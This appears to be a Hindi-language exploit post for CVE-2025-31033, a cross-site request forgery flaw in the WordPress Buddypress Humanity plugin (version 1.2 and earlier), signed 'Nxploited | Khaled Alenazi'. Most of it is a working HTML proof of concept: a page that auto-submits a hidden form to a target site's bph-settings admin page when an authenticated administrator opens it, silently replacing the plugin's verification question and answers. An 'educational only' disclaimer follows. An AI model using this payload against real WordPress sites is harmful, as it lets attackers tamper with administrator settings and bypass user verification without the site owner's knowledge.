
WordPress Buddypress Humanity Plugin <= 1.2 Cross Site Request Forgery (CSRF) के लिए संवेदनशील है।
WordPress के लिए Buddypress Humanity प्लगइन (संस्करण <= 1.2) क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) के लिए कमजोर है।
यह कमजोरी एक हमलावर को उच्च विशेषाधिकार वाले उपयोगकर्ता (जैसे, एडमिन) को अनजाने में प्लगइन सेटिंग्स (जैसे सुरक्षा प्रश्न और उत्तर) को संशोधित करने के लिए मजबूर करने की अनुमति देती है, तथा उपयोगकर्ता सत्यापन तर्क को दरकिनार कर देती है।
bph-settings पृष्ठ (केवल एडमिन)CVE-2025-31033यदि सफलतापूर्वक शोषण किया जाता है, तो यह कमजोरी हमलावरों को निम्नलिखित की अनुमति देती है:
buddypress-humanity<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Exploit – CVE-2025-31033</title>
</head>
<body onload="document.forms[0].submit();">
<form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
<input type="hidden" name="bph_option[bph_title]" value="Nxploited">
<input type="hidden" name="bph_option[bph_question]" value="I’m Nxploited | Khaled Alenazi">
<input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
<input type="hidden" name="bph_submit" value="1">
</form>
</body>
</html>
☠️ एक बार जब यह पृष्ठ किसी प्रमाणित एडमिन द्वारा खोला जाता है, तो यह चुपचाप प्लगइन सेटिंग्स को संशोधित कर देता है।
यह प्रूफ ऑफ कॉन्सेप्ट केवल शैक्षिक उद्देश्यों के लिए है।
जिम्मेदारी से उपयोग करें और उन सिस्टमों पर परीक्षण न करें जिनके आप मालिक नहीं हैं।
लेखक किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
Nxploited | Khaled Alenazi